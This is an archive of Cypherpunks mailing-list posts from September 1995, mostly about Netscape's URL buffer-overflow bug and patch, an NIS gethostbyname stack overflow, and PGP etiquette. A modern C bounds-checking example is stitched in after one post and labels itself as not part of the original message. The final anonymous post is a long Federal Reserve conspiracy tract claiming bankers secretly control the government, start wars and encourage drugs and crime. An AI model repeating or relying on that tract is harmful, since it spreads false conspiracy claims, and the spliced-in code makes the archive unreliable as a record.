On a list with well over 1000 people, I don't need some fraction of them running their own "key etiquette agents" inspecting my posts for conformance to their preferences. --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From futplex at pseudonym.com Wed Sep 27 20:44:36 1995 From: futplex at pseudonym.com (Futplex) Date: Wed, 27 Sep 95 20:44:36 PDT Subject: Another Netscape Bug (and possible security hole) In-Reply-To: <9508278122.AA812233405@ax.asc-yf.wpafb.af.mil> Message-ID: <199509280344.XAA25414@thor.cs.umass.edu> Ray Cromwell writes: # I've found a Netscape bug which I suspect is a buffer overflow and # may have the potential for serious damage. Mike D. writes: > Is there any way to avoid/prevent this problem by changing options in > NetScape? I'm afraid there's no way to completely eliminate the problem without getting the next version of Netscape. There's no apparent way to increase the size of the buffer allocated for a URL at runtime. Of course, that would only be of limited use. Certainly there's no way for a user to really fix the problem by adding a check on the length of the URL. However, a certain amount of common sense will go a long way in avoiding ugly incidents. To put it simply, "look before you leap". Before you click on a link, look at the status bar at the bottom of the Netscape window (in the Unix version at least) that displays the URL of the link under the pointer. To be safe, if it's too long to fit entirely in the status bar, view the source of the current page to find the complete URL. 
(Note that when a URL is too long to fit completely in the status bar, a middle portion of it is elided with "...")

Also, if the link is labelled "Don't click here !" like one on my homepage, don't click there ! :}

-Futplex
"What if you knew her, and found her dead on the ground ? How can you run when you know ?" -Neil Young

From karlton at netscape.com Wed Sep 27 20:51:49 1995
From: karlton at netscape.com (Phil Karlton)
Date: Wed, 27 Sep 95 20:51:49 PDT
Subject: Patch release of Netscape available
Message-ID: <14494.812260307@ghoti.mcom.com>

On ftp://ftp.netscape.com/pub/netscape, you can find the new UNIX, Macintosh and Windows executables. Note that these executables only support 40-bit RC4. We are working out a mechanism to be able to upgrade the 128-bit versions that is acceptable to the U.S. government.

PK
--
Philip L. Karlton karlton at netscape.com
Principal Curmudgeon http://www.netscape.com/people/karlton
Netscape Communications Corporation

From tcmay at got.net Wed Sep 27 20:56:07 1995
From: tcmay at got.net (Timothy C. May)
Date: Wed, 27 Sep 95 20:56:07 PDT
Subject: [ PROPOSED NEW STANDARD ] "I-like-encrypted-mail" tag
Message-ID:

At 3:21 PM 9/27/95, Travis Corcoran wrote:
>Summary:
>
> This message tosses out an idea for conveying within an { email |
> usenet } message the datum "the author of this message prefers to
> receive PGP encrypted communications" in a standard machine-readable
> form.

I don't dislike this idea, so my comments here are only possible routes for those who want to get PGP-encrypted mail.

First, I think Hal Finney was offering at one time to remail the list to anyone in encrypted form (encrypted on his machine(s) to their PGP key, of course). This would increase the volume of PGP mail, of course.

Second, others could make the same offer.

Third, remailers could be used.

Now encrypting a public list doesn't do much, of course, but it does increase the amount of encrypted traffic.
--Tim May

From karlton at netscape.com Wed Sep 27 21:02:43 1995
From: karlton at netscape.com (Phil Karlton)
Date: Wed, 27 Sep 95 21:02:43 PDT
Subject: NIS library code exposure
Message-ID: <14539.812260953@ghoti.mcom.com>

Once again I speak for myself and not Netscape.

While investigating one of the crashes we ended up decompiling some of the code in the C library. It turns out that in some UNIX systems, the code in gethostbyname_yp will copy the hostname argument onto a stack local buffer. That buffer appears to be of size MAXHOSTNAMELEN. [This is very efficient code at destroying the stack: it does not use strcpy or sprintf; there is an inline loop copying characters until it finds a NUL.]

An unstated (in any documentation I could find) limitation on calls to gethostbyname is that the "name" parameter must be a limited size string for it to work at all. I suspect this bug has been in the NIS (nee YP) code for some time.

Do you have any daemons that run as root and do networking? Are you sure that all of them check the length of the host name before passing it to gethostbyname? [Avoid the fencepost error: MAXHOSTNAMELEN is really the size of the buffer and not the maximal string length. You need room for the trailing NUL.]

We have not looked into the networking libraries that are typically found on a PC or Macintosh. The exposure may also be present there.

PK
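The caller-side check Phil Karlton recommends above, with the fencepost handled: an added example, not code from his message or from any vendor's libc. hostname_fits() accepts only names that fit in a char[MAXHOSTNAMELEN] together with the trailing NUL, copy_hostname() is a bounded version of the copy loop he describes, and checked_gethostbyname() refuses over-long names before the resolver library ever sees them. The fallback definition of MAXHOSTNAMELEN is an assumption for systems whose sys/param.h does not provide it.

```c
#include <errno.h>
#include <netdb.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <sys/param.h>

/* Assumption for this example: fall back to the traditional BSD value when
 * the platform's sys/param.h does not define MAXHOSTNAMELEN. */
#ifndef MAXHOSTNAMELEN
#define MAXHOSTNAMELEN 64
#endif

/* Return 1 if `name` fits in a char[MAXHOSTNAMELEN] buffer including its
 * terminating NUL, 0 otherwise.  MAXHOSTNAMELEN is the buffer size, not the
 * maximal string length, so the longest acceptable name has
 * MAXHOSTNAMELEN - 1 characters.  The scan is bounded, so an unterminated
 * input cannot be read past the limit either. */
int hostname_fits(const char *name)
{
    size_t i;
    if (name == NULL)
        return 0;
    for (i = 0; i < MAXHOSTNAMELEN; i++)
        if (name[i] == '\0')
            return 1;      /* NUL found inside the buffer size: fits */
    return 0;              /* no NUL within MAXHOSTNAMELEN bytes: too long */
}

/* Bounded form of the copy described in the message: copies `src` into a
 * MAXHOSTNAMELEN-byte buffer only if it fits, always NUL-terminates, and
 * reports failure instead of writing past the end. */
int copy_hostname(char dst[MAXHOSTNAMELEN], const char *src)
{
    size_t i;
    if (!hostname_fits(src)) {
        dst[0] = '\0';
        return 0;
    }
    for (i = 0; src[i] != '\0'; i++)
        dst[i] = src[i];
    dst[i] = '\0';
    return 1;
}

/* Length-checked front end for gethostbyname(): on an over-long name it
 * returns NULL with errno set to ENAMETOOLONG without calling the resolver. */
struct hostent *checked_gethostbyname(const char *name)
{
    if (!hostname_fits(name)) {
        errno = ENAMETOOLONG;
        return NULL;
    }
    return gethostbyname(name);
}

/* Boundary self-check with constructed names: MAXHOSTNAMELEN - 1 characters
 * is the longest that fits; MAXHOSTNAMELEN characters must be refused.
 * Returns 1 when every case behaves as expected.  No network access is
 * needed because the over-long name never reaches gethostbyname(). */
int fencepost_self_check(void)
{
    char longest_ok[MAXHOSTNAMELEN];
    char one_too_long[MAXHOSTNAMELEN + 1];
    char dst[MAXHOSTNAMELEN];

    memset(longest_ok, 'a', MAXHOSTNAMELEN - 1);
    longest_ok[MAXHOSTNAMELEN - 1] = '\0';
    memset(one_too_long, 'a', MAXHOSTNAMELEN);
    one_too_long[MAXHOSTNAMELEN] = '\0';

    if (!hostname_fits(longest_ok) || hostname_fits(one_too_long))
        return 0;
    if (!copy_hostname(dst, longest_ok) || strcmp(dst, longest_ok) != 0)
        return 0;
    if (copy_hostname(dst, one_too_long) || dst[0] != '\0')
        return 0;
    errno = 0;
    if (checked_gethostbyname(one_too_long) != NULL || errno != ENAMETOOLONG)
        return 0;
    return 1;
}

int main(void)
{
    printf("MAXHOSTNAMELEN = %d, fencepost self-check: %s\n",
           (int)MAXHOSTNAMELEN, fencepost_self_check() ? "ok" : "FAILED");
    return 0;
}
```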
From tcmay at got.net Wed Sep 27 21:13:48 1995
From: tcmay at got.net (Timothy C. May)
Date: Wed, 27 Sep 95 21:13:48 PDT
Subject: Using sound cards to accelerate RSA?
Message-ID:

At 2:39 PM 9/27/95, Simon Spero wrote:
>Somebody mentioned the possibility of using the a/d stage of a sound card
>as a source of random bits, and that brought a thought back to mind:
>given that a lot of sound cards are now shipping with DSP chips on board,
>has anyone written any code that uses the card's DSP to accelerate RSA
>processing?
>
>Maybe there's a mass market for a crypto-blaster- an RNG, 3 or 6
>DES chips, and a DSP. It would make for a killer linux based SHTTP server...

But I don't think Soundblaster-class DSP performance is especially impressive compared to where the market is going with Pentiums. (AMD and Cyrix have both announced plans to exit the 486 market as rapidly as they can--and of course Intel has been doing that for some time already.) It made more sense 2-3 years ago, and a couple of people were talking about finding ways to use modems and DSP cards to accelerate crypto functions. (Paul Rubin, for example, was looking at Trailblazer modems...)

Another problem with such solutions is that they often get marginalized, or left on the sidelines. This has to do with lots of things, including the percentage of people who have various add-on cards, the power of their main CPUs, etc.

(Many things to touch on here. Apple used a DSP chip in their 840av and 660av models, but various problems in supporting these chips cropped up, and Apple phased them out in favor of PPC-only configurations. Intel is pushing "native signal processing" to both sell faster CPUs and ease the programming efforts in supporting DSP chips. Time will tell.)

For other reasons, software solutions are generally preferable to hardware-dependent solutions.
Finally, few crypto applications seem to be limited very much by speed at this time. Audio and video apps, of course, put a strain on processing power, and this is where DSP capabilities make the most difference, probably.

Finally (for real), the effort in supporting DSP chips could probably better be spent elsewhere, given the small effects of a slight increase in speed. Getting PGP more widely integrated into popular programs would seem to me to be a bigger win than in reducing the time to encrypt a message from 3.2 seconds to 1.9 seconds.

--Tim May

From patrick at Verity.COM Wed Sep 27 21:42:07 1995
From: patrick at Verity.COM (Patrick Horgan)
Date: Wed, 27 Sep 95 21:42:07 PDT
Subject: Timothy C. May: Mini-mailbombs and Warning Letters
Message-ID: <9509280438.AA23997@cantina.verity.com>

>
> but the key was not there. Please mail me your key. Thank you.
>
>
> If anyone has a constructive suggestion as to how this mail could be
> changed to convey more information or to be less "threatening", please
> mail me.
>

Sure, I found the above offensive. It comes across in exactly the same tone as a cop saying, "Please step away from the car." I know it's silly, but sometimes Please just isn't enough. The simple change:

    but the key was not there. Could you please mail me your key? Thanks.

works miracles:) The tone on the rest of it was nice. You have to be careful with imperatives. They usually sound mean...even with a please at the front.
Patrick
_______________________________________________________________________
/ These opinions are mine, and not Verity's (except by coincidence;). \
| (\ |
| Patrick J. Horgan Verity Inc. \\ Have |
| patrick at verity.com 1550 Plymouth Street \\ _ Sword |
| Phone : (415)960-7600 Mountain View \\/ Will |
| FAX : (415)960-7750 California 94303 _/\\ Travel |
\___________________________________________________________\)__________/

From rjc at clark.net Wed Sep 27 21:58:52 1995
From: rjc at clark.net (Ray Cromwell)
Date: Wed, 27 Sep 95 21:58:52 PDT
Subject: Patch release of Netscape available
In-Reply-To: <14494.812260307@ghoti.mcom.com>
Message-ID: <199509280458.AAA27626@clark.net>

>
> On ftp://ftp.netscape.com/pub/netscape, you can find the new UNIX,
> Macintosh and Windows executables. Note that these executables only
> support 40-bit RC4. We are working out a mechanism to be able to
> upgrade the 128-bit versions that is acceptable to the U.S.
> government.

Does this release patch both the RNG and the overflow bugs or just the RNG?

-Ray

From patrick at Verity.COM Wed Sep 27 22:02:04 1995
From: patrick at Verity.COM (Patrick Horgan)
Date: Wed, 27 Sep 95 22:02:04 PDT
Subject: Looking for advice.
Message-ID: <9509280458.AA24011@cantina.verity.com>

For two programs communicating via TCP/IP and exchanging authentication information, I want to make sure that the authentication info, (user's name and password,) doesn't pass in the clear. I can think of a few ways to handle this.

1) Encrypt via shared key using symmetric encryption. This works but key management is a problem.

2) Encrypt via public keys using public key encryption. There's licensing issues, and how do you generate public and private pairs for all of the programs? That could be a lot of primes!

3) The "server" could keep user names and passwords stored as hashed values. That way the "client" could do a hash (MD5?) before sending it.
This has the drawback of the server not having access to the unhashed values...if it needs that access this method won't work.

What are other possibilities? What are the answers to my questions and issues above? Can you help?

Patrick

From coe at best.com Wed Sep 27 22:16:00 1995
From: coe at best.com (C.O.E)
Date: Wed, 27 Sep 95 22:16 PDT
Subject: Mathematics Library Plus -- Interactive Math Tutorial
Message-ID:

The Mathematics Library Plus Series include five (5) CD-ROM titles featuring Algebra, Calculus, Statistics, Geometry, and Trigonometry

Each CD-ROM title is a compendium of scientific and mathematical equations. Each listing explains the fundamental principle(s), corollaries of the equation and its sample usage. Each CD-ROM title is a step-by-step and easy-to-follow interactive tutorial software for students from high school to college levels. A comprehensive self study guide with online text references and useful resources for pre-test practices. Hundreds of problems ranging from easy to difficult and come with interactive hints and solutions.

For more info, please visit http://www.coe.com/ari/

To download a copy of the MLP sampler, use anonymous ftp to ftp.coe.com Under the directory, pub/outgoing/mlp

Thank you.
info at coe.com

From karlton at netscape.com Wed Sep 27 22:16:58 1995
From: karlton at netscape.com (Phil Karlton)
Date: Wed, 27 Sep 95 22:16:58 PDT
Subject: Patch release of Netscape available
In-Reply-To: <199509280458.AAA27626@clark.net>
Message-ID: <306A2FA6.41C6@netscape.com>

Ray Cromwell wrote:
> Does this release patch both the RNG and the overflow bugs or just
> the RNG?

Both. We fixed the overflow bugs we could find, including all the examples mailed to cypherpunks.

PK

From fair at clock.org Wed Sep 27 22:40:30 1995
From: fair at clock.org (Erik E. Fair (Time Keeper))
Date: Wed, 27 Sep 95 22:40:30 PDT
Subject: "Notes" to be Eclipsed by "Netscape"
Message-ID:

At 15:21 9/27/95, Bill Stewart wrote:
>Notes was a PC network reimplementation of PLATO, the system that also inspired
>notesfiles, a distant cousin of Netnews (though I'm not sure if netnews was
>originally inspired by PLATO or not...) Netnews assumes that articles are
>going to propagate for a while and then be trashed; notesfiles assumes you're
>building a knowledge base that sticks around. (This transitoriness has
>allowed
>netnews to scale to its current N*100MB/day of trash :-)

Netnews was the old "msgs" program on serious steroids - the thing everyone was supposed to run in their .login (or .profile) scripts to get system-wide announcements. My bet is that msgs was inspired by the TOPS-20/ITS equivalents at MIT. Netnews subsequently underwent relatively rapid forced evolution in its early days to meet the scaling demands of the UUCP network, and the Internet of that time (~1983).
The "notesfiles" system from UIUC that Rob Kolstad and Ray Essick wrote was not so much a distant cousin of NetNews as it was a similar system designed to solve the same problem (distributed message-based computer conferencing); I would argue that NetNews had the better transports and backends, but notesfiles was one or two up on NetNews in UI features (message threads, etc). The two were sufficiently close that (bad) gateways were written to move messages from one system to the other.

With any luck, the next round of NetNews user interfaces will remove all of the UI advantages of notesfiles - the hooks have always been there, but writing good UIs is hard work, and most NetNews hackers (me included) have had more fun/luck/interest in hacking the transport level to be ever more slightly efficient.

>AT&T Network Notes is a joint AT&T/Lotus project that uses AT&T's public IPX
>network
>to support Notes on; I think it's now rolled out and accepting customers,
>but it was mostly in press-release stage while I was at AT&T.

I had the impression from what I read that this was going to be an IPX WAN, and that after announcing this Brave New Service, the partners discovered just how poorly IPX behaves on a WAN, and so have backed out to Notes on IP for this thing. I haven't heard much about it since, but I'd be surprised to find AT&T being foolish enough to try and operate an IPX WAN.

>Notes does have encryption, using RSA and I think RC4; I'm not sure if they
>do the
>40 bits exportable/ 128 domestic bit or just use 40 bits. Don't know about
>overflow
>kinds of bugs; the bugs I've heard about were more problems integrating with
>Cc:Mail :-)

Lotus is indeed one of RSA's licensees; I remember reading that in the WSJ at about the same time that Apple became one.

I still place my message-based distributed collaboration bets on NetNews technology, or some obvious derivative of it.

Erik Fair

From goedel at tezcat.com Wed Sep 27 22:40:32 1995
From: goedel at tezcat.com (Dietrich J. Kappe)
Date: Wed, 27 Sep 95 22:40:32 PDT
Subject: Netscape seems to fix the overflow bug
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

Simple testing with the Netscape update would seem to indicate that the overflow bug has been fixed. How about the RNG hole?

Dietrich Kappe | Red Planet http://www.redweb.com
Red Planet, LLC| "Chess Space" | "MS Access Products" | PGP Public Key
1-800-RED 0 WEB| /chess | /cobre | /goedel/key.txt
Web Publishing | Key fingerprint: 8C2983E66AB723F9 A014A0417D268B84

From jsw at neon.netscape.com Wed Sep 27 22:41:42 1995
From: jsw at neon.netscape.com (Jeff Weinstein)
Date: Wed, 27 Sep 95 22:41:42 PDT
Subject: WSJ on Netscape Hole 3
In-Reply-To:
Message-ID: <44dcgs$b36@tera.mcom.com>

In article , cman at communities.com (Douglas Barnes) writes:
> As for objections about how worthwhile this is, it's pretty clear
> that a patch will be available for this problem before we can finish
> and publicize an exploit. This is not, however, the last piece of
> network software that will contain problems of this sort, and it is
> a good idea to build up expertise in this area. I'd also suggest going
> after some of the other browsers... I know, for instance, that AOL's
> browser dies horribly on these same sort of URLs.

The patched version is now available at ftp://ftp.netscape.com/pub/netscape/

--Jeff
--
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw at netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.
From jsw at neon.netscape.com Wed Sep 27 22:48:34 1995
From: jsw at neon.netscape.com (Jeff Weinstein)
Date: Wed, 27 Sep 95 22:48:34 PDT
Subject: It's Wednesday
In-Reply-To: <199509271646.MAA06516@panix.com>
Message-ID: <44dcts$b36@tera.mcom.com>

In article <199509271646.MAA06516 at panix.com>, frissell at panix.com (Duncan Frissell) writes:
> Do you know where your new Netscape is?

Sure. It's on ftp://ftp.netscape.com/pub/netscape. It has been there for several hours.

--Jeff

From jsw at neon.netscape.com Wed Sep 27 22:49:54 1995
From: jsw at neon.netscape.com (Jeff Weinstein)
Date: Wed, 27 Sep 95 22:49:54 PDT
Subject: Another Netscape Bug (and possible security hole)
In-Reply-To: <9508278122.AA812233405@ax.asc-yf.wpafb.af.mil>
Message-ID: <44dd09$b36@tera.mcom.com>

In article <9508278122.AA812233405 at ax.asc-yf.wpafb.af.mil>, donlonm at ccmail.mcclellan.af.mil writes:
> Ray,
>
> You wrote:
>
> >I've found a Netscape bug which I suspect is a buffer overflow and
> >may have the potential for serious damage. If it is an overflow bug,
> >then it may be possible to infect every computer which accesses a web
> >page with Netscape.
>
> Is there any way to avoid/prevent this problem by changing options in
> NetScape?

Just get the fixed version, or a patch from: ftp://ftp.netscape.com/pub/netscape/

--Jeff

From hayden at krypton.mankato.msus.edu Wed Sep 27 22:58:13 1995
From: hayden at krypton.mankato.msus.edu (Robert A. Hayden)
Date: Wed, 27 Sep 95 22:58:13 PDT
Subject: Problems with netscape patch and W95
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

I thought I'd post this here since there is a netscape dude hanging around :-)

I downloaded the patch for the 32-bit windoze version and couldn't get it installed. I had the old installation in the default C:\Program Files\Netscape\Navigator (with the space in the directory name), but every incarnation I tried, including the Progra~1 8.3 name couldn't be found. I finally just stripped out the old and reinstalled the new. Annoying but functional.

Please double check this in any future patches, or better yet, put in a search utility that finds it for you, something like "Netscape was found in C:\Foo\Bar. Patch here?" If no, then search more until exhausted.

Sorry for the non-CP traffic, just trying to reach the right people the fastest. :-)

____ Robert A. Hayden <=> hayden at krypton.mankato.msus.edu
\ /__ Finger for Geek Code Info <=> Finger for PGP Public Key
\/ / -=-=-=-=-=- -=-=-=-=-=-
\/ http://krypton.mankato.msus.edu/~hayden/Welcome.html

From ravage at einstein.ssz.com Wed Sep 27 22:59:17 1995
From: ravage at einstein.ssz.com (Jim Choate)
Date: Wed, 27 Sep 95 22:59:17 PDT
Subject: Mathematics Library Plus -- Interactive Math Tutorial (fwd)
Message-ID: <199509280612.BAA07163@einstein.ssz.com>

Forwarded message:

From anon-remailer at utopia.hacktic.nl Wed Sep 27 23:11:31 1995
From: anon-remailer at utopia.hacktic.nl (Anonymous)
Date: Wed, 27 Sep 95 23:11:31 PDT
Subject: No Subject
Message-ID: <199509280611.HAA02214@utopia.hacktic.nl>

that they do. 95% of all "cash" transactions in the U.S. are by check. Checks are thus effectively also currency. The banker creates the so-called "loan" by writing a check or deposit slip, not against actual money, but against your promise to pay back the loan. The only cost to the bank is the paper, ink, and a few dollars in salaries and office costs for each transaction. It is "check-kiting" on an enormous scale! The profits are enormous as shown below.

THE COST TO YOU? PRACTICALLY EVERYTHING

In 1910 the U.S. federal debt was $1,147,000,000 - $12 per citizen. State and local debts were practically non-existent, and government was small and not oppressive. By 1920, after only six years of the Federal Reserve handling our currency, the federal debt had jumped to $24 billion - $228 per citizen. The Federal Government began to grow like an invisible cancer in its early stages. By 1968 the federal debt had jumped to $347 billion - $1,717 per citizen.
Ten years later, by 1978 it had doubled again to $763 billion - $3,500 per citizen. That is a debt of $17,500 for every family of five in America. Federal debt has been growing faster and faster since. And the Federal Government has become a debilitating cancer rapidly sapping and weakening its victim.

Today in 1992 the federal debt is over $4 trillion. (And they "cook the books" on the low side to come up with that figure - see Chapter Nine.) The $4 trillion national debt amounts to $16,000 per citizen, or $80,000 per family of five. And if that debt were calculated in terms of working or tax-paying families, it would be considerably higher. The Federal Government has become a bloated, out-of-control parasite, a terminal cancer. The economy seems so weak that even after many months of blowing up the currency supply, signs of recovery have to be searched for. The entire system may be on the brink of complete collapse.

The above figures do not include state, municipal, school district, business, or personal debts, which total an additional $3 trillion. Total debt in America is thus over $7 trillion - $28,000 per citizen - $120,000 per family of five. This is more than twice the assessed value of all the land and buildings in America. Effectively all of America has been signed over to the bankers. They can take America and we would still owe them another America! Of course, it is to their advantage not to take actual title to the property, so we will not realize that we really own nothing. Instead they leave us with "ownership" so we will willingly continue to work and pay ever higher tributes to the bankers. What we really have is national bankruptcy.

Let me repeat the words of Senator John Danforth: "I have never seen more senators express discontent with their jobs... I think the major cause is that, deep down in our hearts, we have been accomplices to doing something terrible and unforgivable to this wonderful country.
Deep down in our hearts, we know that we have bankrupted America and that we have given our children a legacy of bankruptcy.... We have defrauded our country to get ourselves elected."

THE INEXORABLE TRANSFER OF WEALTH TO THE BANKERS

To grasp the fact that periodic withdrawal of currency through interest payments to the bankers will inexorably transfer all wealth in the nation to the receivers of interest, imagine yourself in a poker or dice game. Everyone has to buy chips (the medium of exchange) from a "banker" who does not risk chips in the game, but watches the table and every hour reaches in and takes 10% to 15% of all the chips on the table. As the game progresses, the number of chips in the possession of each player will go up and down with his or her "luck." However, the total number of chips available to play the game (carry on business and trade) will decrease steadily, while the "banker's" mountain of chips just grows and grows.

The game will get low on chips, and some players will run out. If they want to continue to play, they must buy or borrow more chips from the "banker." The "banker" will sell (lend) the player more chips only if the player signs a "mortgage" agreeing to give the "banker" some real property (car, home, farm, business, etc.). If the payments should go into default, the banker takes the property. The payments must be made on time, whether the player wins (makes a profit) or not.

It is easy to see that no matter how skillfully the players play, eventually the "banker" will end up with all of his chips back. Except for the very best or "luckiest" players, the rest, if they stay in the game long enough, will end up owing to the "banker" their cars, their homes, their farms, their businesses, and perhaps even their watches, rings, and the shirts off their backs!
Sir Josiah Stamp, President of the Bank of England in the 1920s, and the second richest man in Britain at the time, said: "Banking was conceived in iniquity and was born in sin. The bankers own the earth. Take it away from them but leave them in power to create deposits, and with the flick of the pen they create enough deposits to buy it back again. However, take it away from them, and all the great fortunes like mine will disappear, and they ought to disappear, for this would be a happier and better world to live in. But, if you wish to remain the slaves of bankers and pay the cost of your own slavery, let them continue to create deposits."

Our real-life situation is much worse than any poker game. In a poker game no one is forced to go into debt, and anyone can quit at any time and keep whatever he or she still has. But in real life, even if we borrow little ourselves from the bankers, the local, state, and federal governments borrow billions in our name, squander it, then confiscate our earnings from us and pay it to the bankers with interest. We are forced to play their game, and it seems we can only leave the game by dying. We pay as long as we live, and our children pay after we die. If we cannot pay, the same government sends the police to take our property and give it to the bankers. The bankers risk nothing (at least, the Federal Reserve bankers) in the game; they just collect their percentage and "win it all."

In Las Vegas all the games are "rigged" to pay the house (owner) a percentage. They rake in millions. The Federal Reserve bankers' "game" is similarly rigged, and it pays off in billions.

In recent years bankers have added more "cards" to their game. "Credit" cards are promoted as a convenience and a great boon to trade. Actually, they are ingenious devices by which bankers collect 2% to 5% of every retail sale from the seller and 18% or more interest from buyers. A real stacked deck!
POLITICIANS AND BANKERS IN THE SAME LEAGUE

Democrat, Republican, and Independent voters have wondered why politicians always spend more tax currency than they collect. The reason should now be clear. When you study our "debt-currency" system, you soon realize that the politicians are not the agents of the people. They are the agents of the Federal Reserve Bankers, for whom they plan ways to place the people further in debt.

Let me again quote the words of Senator John Danforth: "I have never seen more senators express discontent with their jobs... I think the major cause is that, deep down in our hearts, we have been accomplices to doing something terrible and unforgivable to this wonderful country. Deep down in our hearts, we know that we have bankrupted America and that we have given our children a legacy of bankruptcy.... We have defrauded our country to get ourselves elected."

Article 1, Section 8 of the U.S. Constitution states, "The Congress shall have power... to coin money, regulate the value thereof..." But what have our politicians done? In 1913 they traitorously gave the U.S. Treasury to the Federal Reserve bankers - lock, stock, and barrel!

Someone recently asked, "What's the difference between Kindergarten and Congress?" Answer: "One has adult supervision!" Actually, we shouldn't criticize Congress, after all, we have the best Congress money can buy. Chapter Ten examines Congress in more detail.

FEDERAL RESERVE SYSTEM AUDIT

The Federal Reserve has never been audited by the government. In 1975 a bill H.R. 4316, to require Federal Reserve audits, was introduced in Congress. Due to pressure from the currency-controllers, it was rejected. No audit of the Federal Reserve has ever been done.

MOUNTING DEBTS AND WARS

We, as a people are now ruled by a "banker-owned system" that has usurped the mantle of government, disguised itself as our legitimate government, and set about to pauperize and control the people.
It is now a centralized, all-powerful apparatus whose main purposes are spending the people's currency, promoting war, and propagandizing to perpetuate itself in power. Our two large political parties (the "Demopublicans" also called "Republicrats") have become its servants, the various departments of government its spending agencies, and the Internal Revenue Service its collection agency.

Unknown to the people, our "banker-owned system" operates in close cooperation with similar apparatuses in other nations, also disguised as "governments." Some, we are told, are friends. Others, we are told, are enemies. "Enemies" are built up through international manipulations and used to frighten the American people into going billions of dollars more into debt to the bankers for "military preparedness," "foreign aid to stop communism," "minority rights," etc. Citizens, deliberately confused by brainwashing propaganda, watch helplessly while our politicians give our food, goods, and gold to banker-controlled alien governments under the guise of "better relations," "easing tensions," or "humanitarian aid."

Our banker-controlled government takes our finest and bravest sons and sends them into foreign wars, where tens of thousands are murdered and hundreds of thousands are crippled. Other thousands are morally corrupted and addicted to drugs. When the "war" is over we have gained nothing, but we are scores of billions more in debt to the bankers - which was the real reason for the war in the first place!

MORE THAN JUST ECONOMIC RAPE

The profits from these massive debts have been used to erect a complete and almost hidden economic and political colossus over our nation. Our "banker-owned system" keeps telling us they are trying to do us good, when in truth they work to harm and injure the people.
These would-be despots know it is easier to control and rob an ignorant, poorly-educated, and confused people than it is an informed population, so they deliberately degrade our educational systems. For the same reason they secretly favor drug use, alcohol, racial conflict, and crime in general. Their "war on drugs," as an example, only produces more drug use and a host of related crimes. Everything which debilitates the minds and bodies of the people is secretly encouraged, as it makes the people less able to oppose them, or even to understand what is being done to them. The system wants mediocre, unthinking, helpless "sheople."

Family, morals, and all that is honorable is being swept away, while our "banker-owned system" builds their new subservient man, the foundation of their "new world order." Our new rulers are trying to change our whole political, social, and racial order, but they will not change the debt-currency economic system by which they rob and rule. Our people have become tenants and "debt-slaves" to the bankers and their agents in the land our fathers conquered. It is conquest through the most gigantic fraud and swindle in the history of humankind. And we remind you again: The key to their wealth and power over us is their MONOPOLISTIC ability to "create" currency out of nothing and to lend it to us at interest. If Congress had not allowed them to do that, they never would have gained secret control over our nation.

CONTROLLED NEWS AND INFORMATION

This currency-lender conspiracy ("consPIRACY") is as old as Babylon. Even in America it dates far back before 1913. Actually, 1913 was the year in which the way opened for complete economic conquest of our people.
The conspiracy is old enough to America so that the system's agents have been for many years in positions such as newspaper publishers, editors, columnists, church ministers, university presidents, professors, textbook authors, attorneys, accountants, labor union leaders, movie makers, radio and TV commentators, politicians from school board members to U.S. Presidents, and many others. These agents control the information available to our people. They manipulate public opinion, elect who they will locally and nationally, and never expose the crooked currency system. They promote school bonds, municipal bonds, expensive and detrimental farm programs, "urban renewal," "foreign aid," and many other schemes which will put the people more in debt to the bankers. Thoughtful citizens wonder why billions are spent on one program and billions on another which may duplicate or even nullify it, such as paying some farmers not to raise crops, while at the same time building dams or canals to irrigate more farm land. Crazy or stupid? Neither. The goal is more debt. Thousands of government-sponsored ways to waste "money" are perpetrated continually. Most make no sense, but they are never exposed for what they really are: builders of billions for the bankers and debts for the people.

So-called "economic experts" write syndicated columns in hundreds of newspapers, craftily designed to prevent the people from learning the simple truth about our debt-currency system. Commentators on radio and TV, educators, and politicians blame the people as wasteful, lazy, or spendthrift, and blame the workers and consumers for the increase in debts and the inflation of prices, when they really know that the basic cause is the debt-currency system itself. Our people are drowned in charges and counter-charges designed to confuse them and keep them from understanding the evil currency system that so silently robs the workers, farmers, and business people of the fruit of their labor.
And, increasingly, the system is being used to rob us of our rights and freedoms, supposedly guaranteed by the U.S. Constitution.

In his book INVENTING REALITY, Michael Parenti wrote:

"Ten business and financial corporations control the three major television and radio networks (NBC, CBS, ABC), 34 subsidiary television stations, 201 cable TV systems, 62 radio stations, 20 record companies, 59 magazines, 58 newspapers, including the NEW YORK TIMES, the WASHINGTON POST, THE WALL STREET JOURNAL, and the LOS ANGELES TIMES, 41 book publishers and various motion picture companies like Columbia Pictures and Twentieth Century Fox. Three quarters of the major stockholders of ABC, CBS and NBC are banks, such as Chase Manhattan, Morgan Guaranty Trust, Citibank, and Bank of America. The overall pattern is one of increasing concentration of ownership and earnings. According to a 1982 LOS ANGELES TIMES survey, independent daily newspapers are being gobbled up by the chains at the rate of fifty or sixty a year. Ten newspaper chains earn over half of all newspaper revenue in this country. Five media conglomerates share 95 percent of the record and tapes market with Warner and CBS alone controlling 65 percent of the market. Eight Hollywood studios account for 89 percent of U.S. feature film rentals. Three television networks earn over two-thirds of total U.S. television revenues. Seven paperback publishers dominate the mass market for books... While having an abundance of numbers and giving an appearance of diversity, the mass media actually are highly centralized outlets that proffer a remarkably homogenized fare. News services for dailies throughout the entire nation are provided by the Associated Press and United Press International (which may soon merge with AP or go under), The New York Times-Washington Post wire services, and several foreign wire services like Reuters.
The ideological viewpoint of these news conduits are pretty much the same, marked by prefabricated standardization of news which is constricting and frightening."

In his book THE MEDIA MONOPOLY, Ben H. Bagdikian writes:

"The power to control information is a major lever in the control of society. Giving citizens a choice in ideas and information is as important as giving them a choice in politics. If a nation has narrowly controlled information it will soon have narrowly controlled politics."

When a few informed and concerned people or organizations who know the truth begin to expose the bankers and their agents, or try to stop any of their mad schemes, the messengers are ridiculed and smeared as "right-wing extremists," "super-patriots," "bigots," "racists," "fascists," or "antisemites." Any name is used to discredit them, and to stop other people from listening. Books and articles such as you are now reading are kept out of schools, libraries, and book stores.

